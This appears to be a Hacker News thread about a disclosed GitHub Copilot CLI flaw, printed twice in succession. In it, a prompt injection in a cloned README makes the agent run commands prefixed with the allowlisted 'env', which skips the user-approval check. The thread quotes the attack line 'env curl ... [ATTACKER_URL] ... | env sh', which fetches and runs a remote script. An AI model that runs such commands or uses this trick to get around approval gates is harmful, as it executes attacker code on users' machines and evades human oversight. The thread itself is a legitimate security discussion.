This isn't a novel technical vulnerability write up.
The author had copilot read a "prompt injection" inside a readme while copilot is enabled to execute code or run bash commands (which user had to explicitly agree to).
I highly suspect this account is astro-turfing for the site too... look at their sidebar:
```
Claude Cowork Exfiltrates Files
HN #1
Superhuman AI Exfiltrates Emails
HN #12
IBM AI ('Bob') Downloads and Executes Malware
HN #1
Notion AI: Data Exfiltration
HN #4
HuggingFace Chat Exfiltrates Data
Screen takeover attack in vLex (legal AI acquired for $1B)
Google Antigravity Exfiltrates Data
HN #1
CellShock: Claude AI is Excel-lent at Stealing Data
Hijacking Claude Code via Injected Marketplace Plugins
Data Exfiltration from Slack AI via Indirect Prompt Injection
HN #1
Data Exfiltration from Writer.com via Indirect Prompt Injection
HN #5
```
It's probably bad that the system 1) usually prompts you to take shell actions like `curl`, but 2) by default whitelists `env` and `find` that can invoke whatever it wants without approval.
If 2) is fine then why bother with 1)? In yolo mode such an injection would be "working as designed", but it's not in yolo mode. It shouldn't be able to just do `env sh` and run whatever it wants without approval.
Isn’t the news that “curl whatever” will prompt the user for confirmation but “env curl whatever” won’t?
It's a valid observation that we can bypass the coding AI's user prompting gate with the right prompt.
But is it a security issue on copilot that the user explicitly giving AI permission and instructed it to curl a url?
Regardless of the coding agent, I suspect eventually all of the coding agents will behave the same with enough prompting regardless if it's a curl command to a malicious or legitimate site.
The user didn't need to give it curl permission, that's the whole issue:
> Copilot also has an external URL access check that requires user approval when commands like curl, wget, or Copilot’s built-in web-fetch tool request access to external domains [1].
> This article demonstrates how attackers can craft malicious commands that go entirely undetected by the validator - executing immediately on the victim’s computer with no human-in-the-loop approval whatsoever.
I think there's different conversations happening and I don't think we're having the same conversation.
This is the claim by the article: "Vulnerabilities in the GitHub Copilot CLI expose users to the risk of arbitrary shell command execution via indirect prompt injection without any user approval"
But this is not true, the author gave explicit permission on copilot startup to trust and execute code in the folder.
Here's the exact starting screen on copilot:
│ Confirm folder trust │
│ │
│ ╭─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮ │
│ │ /Users/me/Documents │ │
│ ╰─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯ │
│ │
│ Copilot may read files in this folder. Reading untrusted files may lead Copilot to behave in unexpected ways. With your permission, Copilot may execute │
│ code or bash commands in this folder. Executing untrusted code is unsafe. │
│ │
│ Do you trust the files in this folder? │
│ │
│ 1. Yes │
│ 2. Yes, and remember this folder for future sessions │
│ 3. No (Esc) │
And `The injection is stored in a README file from the cloned repository, which is an untrusted codebase.`
It does circumvent a flimsy control:
"The env command is part of a hard-coded read-only command list stored in the source code. This means that when Copilot requests to run it, the command is automatically approved for execution without user approval."
Reading the other posts on their site, I don't agree. It's just like any other security research shop. I've found most of their posts quite thorough and the controls being circumvented well explained.
Please email the mods rather than posting accusations of astroturfing. You may well be right, but they specifically direct us to say that to them rather than in comments. The footer contact email works well for this.
Skip to here:
> However, if those shell commands (e.g., curl) are not detected, the URL permissions do not trigger. Here is a malicious command that bypasses the shell command detection mechanisms:
So GH Copilot restricts curl, but not if it's run with `env` prepended.
It's because in this case "curl" is just a parameter to env. Env just happens to execute curl (or indeed sh, which seems, uh, worse).
Seems nuts to have env or find on the default allowlist to me! Really these agents shouldn't be able to execute anything at all without approval by default, if you want to give it something like "find" or "env" to do safe things without approval, reimplement the functionality you want as a tool that can't do arbitrary code execution.
> The env command is part of a hard-coded read-only command list stored in the source code. This means that when Copilot requests to run it, the command is automatically approved for execution without user approval.
Wait, what? Sure, you can use "env" like "printenv", to display the environment, but surely its most common use is to run other commands, making its inclusion on this list an odd choice, to say the least.
Here is a malicious command that bypasses the shell command detection mechanisms:
$ env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh
lol
does everyone really need their own coding agent CLI? i feel like companies are skipping security to push out these tools
There are many security and business risks in developing and releasing software (eg. supply chain attacks, misconfigurations & security-relevant bugs), and many ways to manage them. For companies, this is just another risk to be managed.
This isn't a novel technical vulnerability write up.
The author had copilot read a "prompt injection" inside a readme while copilot is enabled to execute code or run bash commands (which user had to explicitly agree to).
I highly suspect this account is astro-turfing for the site too... look at their sidebar:
``` Claude Cowork Exfiltrates Files
HN #1
Superhuman AI Exfiltrates Emails
HN #12
IBM AI ('Bob') Downloads and Executes Malware
HN #1
Notion AI: Data Exfiltration
HN #4
HuggingFace Chat Exfiltrates Data
Screen takeover attack in vLex (legal AI acquired for $1B)
Google Antigravity Exfiltrates Data
HN #1
CellShock: Claude AI is Excel-lent at Stealing Data
Hijacking Claude Code via Injected Marketplace Plugins
Data Exfiltration from Slack AI via Indirect Prompt Injection
HN #1
Data Exfiltration from Writer.com via Indirect Prompt Injection
HN #5 ```
It's probably bad that the system 1) usually prompts you to take shell actions like `curl`, but 2) by default whitelists `env` and `find` that can invoke whatever it wants without approval.
If 2) is fine then why bother with 1)? In yolo mode such an injection would be "working as designed", but it's not in yolo mode. It shouldn't be able to just do `env sh` and run whatever it wants without approval.
Isn’t the news that “curl whatever” will prompt the user for confirmation but “env curl whatever” won’t?
It's a valid observation that we can bypass the coding AI's user prompting gate with the right prompt.
But is it a security issue on copilot that the user explicitly giving AI permission and instructed it to curl a url?
Regardless of the coding agent, I suspect eventually all of the coding agents will behave the same with enough prompting regardless if it's a curl command to a malicious or legitimate site.
The user didn't need to give it curl permission, that's the whole issue:
> Copilot also has an external URL access check that requires user approval when commands like curl, wget, or Copilot’s built-in web-fetch tool request access to external domains [1].
> This article demonstrates how attackers can craft malicious commands that go entirely undetected by the validator - executing immediately on the victim’s computer with no human-in-the-loop approval whatsoever.
I think there's different conversations happening and I don't think we're having the same conversation.
This is the claim by the article: "Vulnerabilities in the GitHub Copilot CLI expose users to the risk of arbitrary shell command execution via indirect prompt injection without any user approval"
But this is not true, the author gave explicit permission on copilot startup to trust and execute code in the folder.
Here's the exact starting screen on copilot:
│ Confirm folder trust │ │ │ │ ╭─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮ │ │ │ /Users/me/Documents │ │ │ ╰─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯ │ │ │ │ Copilot may read files in this folder. Reading untrusted files may lead Copilot to behave in unexpected ways. With your permission, Copilot may execute │ │ code or bash commands in this folder. Executing untrusted code is unsafe. │ │ │ │ Do you trust the files in this folder? │ │ │ │ 1. Yes │ │ 2. Yes, and remember this folder for future sessions │ │ 3. No (Esc) │
And `The injection is stored in a README file from the cloned repository, which is an untrusted codebase.`
It does circumvent a flimsy control:
"The env command is part of a hard-coded read-only command list stored in the source code. This means that when Copilot requests to run it, the command is automatically approved for execution without user approval."
Reading the other posts on their site, I don't agree. It's just like any other security research shop. I've found most of their posts quite thorough and the controls being circumvented well explained.
Please email the mods rather than posting accusations of astroturfing. You may well be right, but they specifically direct us to say that to them rather than in comments. The footer contact email works well for this.
Skip to here:
> However, if those shell commands (e.g., curl) are not detected, the URL permissions do not trigger. Here is a malicious command that bypasses the shell command detection mechanisms:
> env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh
So GH Copilot restricts curl, but not if it's run with `env` prepended.
It's because in this case "curl" is just a parameter to env. Env just happens to execute curl (or indeed sh, which seems, uh, worse).
Seems nuts to have env or find on the default allowlist to me! Really these agents shouldn't be able to execute anything at all without approval by default, if you want to give it something like "find" or "env" to do safe things without approval, reimplement the functionality you want as a tool that can't do arbitrary code execution.
> The env command is part of a hard-coded read-only command list stored in the source code. This means that when Copilot requests to run it, the command is automatically approved for execution without user approval.
Wait, what? Sure, you can use "env" like "printenv", to display the environment, but surely its most common use is to run other commands, making its inclusion on this list an odd choice, to say the least.
does everyone really need their own coding agent CLI? i feel like companies are skipping security to push out these tools
There are many security and business risks in developing and releasing software (eg. supply chain attacks, misconfigurations & security-relevant bugs), and many ways to manage them. For companies, this is just another risk to be managed.